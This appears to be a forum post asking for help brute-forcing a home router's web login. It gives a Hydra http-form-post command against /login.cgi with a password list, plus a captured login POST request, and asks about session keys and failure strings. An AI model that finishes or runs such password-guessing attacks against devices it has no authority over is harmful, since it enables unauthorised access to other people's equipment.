Hello,
I'm trying to hack into my router (Not doing anything nefarious)
Can I get some help with the '/login.cgi' part?
hydra 192.168.1.254 http-form-post "/login.cgi:sessionKey=177691457&inputUserName=^USER^&inputPassword=^PASS^:err" -L admin -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt
I'm guessing that in the current state even if hydra was to get the password correct it would still respond in "msg=err". Because I need to have a proper session key.
Also any idea what "nothankyou=1" is? Do I need to have that in the command?
Is there like a cookie file I have to use to generate session keys?
Also ":err" is like a . "If response is not 'err' then that was a correct password" Is this piece correct? The browser returns "http://192.168.1.254/index.html?msg=err"
Should it be ":msg=err"?
Thanks for your help.
POST http://192.168.1.254:80/login.cgi HTTP/1.1
Host: 192.168.1.254
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.254/
Cookie: Telus=T1200H-31.128L.07
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-length: 68
sessionKey=1286954970&inputUserName=as&inputPassword=fd¬hankyou=1